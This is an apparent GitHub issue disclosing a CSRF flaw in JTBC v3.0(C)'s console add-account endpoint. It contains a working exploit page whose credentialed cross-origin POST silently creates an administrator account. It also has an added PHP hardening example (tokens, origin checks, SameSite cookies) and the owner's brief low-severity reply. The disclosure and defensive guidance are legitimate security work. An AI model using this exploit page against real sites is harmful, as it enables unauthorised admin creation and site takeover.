There is a CSRF vulnerability that can add an administrator account #4

Closed
Eth4nHunt opened this Issue Sep 18, 2018 · 1 comment
Eth4nHunt commented Sep 18, 2018

/console/account/manage.php?type=action&action=add in JTBC v3.0(C) has a CSRF vulnerability. After the administrator has logged in, opening the CSRF exploit page adds an administrator.
CSRF exploit (1.html):

```html
<!-- 1.html: the exploit page as posted; comments added for readability -->
<title>test csrf</title>
<script type="text/javascript">
    // Target: the add-account action of the JTBC console (x.x.x.x as in the report)
    var url = "http://x.x.x.x/phpjtbc/console/account/manage.php?type=action&action=add";
    // Form body that creates the new account; role=-1 is the value used in the report
    var postStr = 'username=testcsrf&password=123456&cpassword=123456&role=-1&email=test%40test.com';
    var ajax = null;
    if (window.XMLHttpRequest) {
        ajax = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        ajax = new ActiveXObject("Microsoft.XMLHTTP"); // legacy IE fallback
    } else {
        ajax = null;
    }
    // Synchronous cross-origin POST. withCredentials makes the browser attach the
    // victim's session cookie, and a form-urlencoded body keeps this a "simple"
    // request, so no CORS preflight is sent: the server processes it even though
    // this page is never allowed to read the response.
    ajax.open("POST", url, false);
    ajax.withCredentials = true;
    ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
    ajax.send(postStr);
</script>
```
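The endpoint as reported accepts the POST on the strength of the session cookie alone, which the browser attaches to the cross-site request above. The following is an added example, not JTBC's own code, of how a state-changing console action like this one can be hardened in PHP: a per-session token bound to the form, a constant-time comparison, an Origin/Referer check as defence in depth, and a SameSite session cookie so the browser stops sending the cookie on cross-site POSTs in the first place. The function names, the `csrf_token` parameter name and the cookie parameters are assumptions for illustration.

```php
<?php
// Added example (not JTBC code): protecting an action such as
// account/manage.php?type=action&action=add against cross-site requests.
declare(strict_types=1);

// SameSite=Lax means the session cookie is not sent on a cross-site POST,
// so the exploit page's request arrives unauthenticated. (PHP 7.3+ option.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Issue one random token per session; the form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token equals the session token.
// hash_equals() compares in constant time so the token cannot be
// recovered byte by byte through timing differences.
function csrf_token_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Defence in depth: a request triggered from the attacker's page carries the
// attacker's Origin (or Referer). Reject anything that is not from this host,
// and also reject requests that carry neither header.
function same_origin_request(array $server, string $expected_host): bool
{
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $header) {
        if (!empty($server[$header])) {
            $host = parse_url($server[$header], PHP_URL_HOST);
            return is_string($host) && strcasecmp($host, $expected_host) === 0;
        }
    }
    return false;
}

// Guard for type=action&action=add: all checks must pass before any account is created.
if (($_GET['type'] ?? '') === 'action' && ($_GET['action'] ?? '') === 'add') {
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST'
        || !csrf_token_valid($_POST, $_SESSION)
        || !same_origin_request($_SERVER, $_SERVER['SERVER_NAME'] ?? '')) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    // ... the existing add-account logic (username, password, cpassword, role, email)
    //     runs only after the checks above ...
}
```

The add-account form has to carry the token as a hidden field named `csrf_token` whose value is `csrf_token()` (HTML-escaped), otherwise legitimate submissions fail the check as well. The exploit page above cannot obtain that value: it cannot read the administrator's pages cross-origin, so it cannot forge a valid request. SameSite on its own is not a complete fix (older browsers, and any attacker page on a sibling subdomain of the same site), which is why the token check stays the primary control.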
jetiben (Owner) commented Sep 20, 2018

Thank you for your feedback. This is a low-severity issue; I will improve it when I have time.

jetiben closed this Sep 20, 2018
